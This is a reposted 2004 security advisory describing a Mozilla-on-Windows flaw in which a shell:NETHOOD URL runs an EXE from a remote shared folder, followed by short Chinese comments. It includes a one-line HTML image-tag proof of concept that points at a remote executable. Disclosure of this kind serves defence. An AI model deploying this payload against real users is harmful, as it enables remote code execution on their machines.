更加详细的介绍: SUBJ: MOZILLA: SHELL can execute remote EXE program DATE: 2004/07/09 FROM: Liu Die Yu 　　　　　　　　　　　　　　　　　　# [START] Advisory COPYRIGHT --------- This Advisory is Copyright (c) 2004 "Liu Die Yu". You may distribute it unmodified. You may not modify it and distribute it or distribute parts of it without the author';s written permission. ( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME ) TESTED ------ MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616") running on winxp.en.home.sp1a.up2date.20040709 PROCESS ------- Victim visits a shared folder named "shared" on a server named "X-6487ohu4s6x0p". This will create a shortcut named "shared on X-6487ohu4s6x0p" in the folder at "shell:NETHOOD" At last, make MOZILLA request the following URL: shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe A file named "fileid.exe" in the "shared" folder will be executed. REFERENCE --------- MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url: http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html greetingz fly to perrymonj. WINDOWS support "shell:NETHOOD": http://does-not-exist.org/mail-archives/bugtraq/msg02171.html thanks to malware for his additional research , and Cheng Peng Su for his original discovery. liudieyu http://umbrella.name 　　　　　　　　　　　　# [START] PROOF OF CONCEPT 　　　　　　　　　　### [IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"] 来源:http://666w.com/art/568.htm

MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url:
http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html
WINDOWS support "shell:NETHOOD":

当在http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html 操纵了有效的shell协议，MOZILLA 将会执行一个文件，windows支持shell:NETHOOD
无语.
汗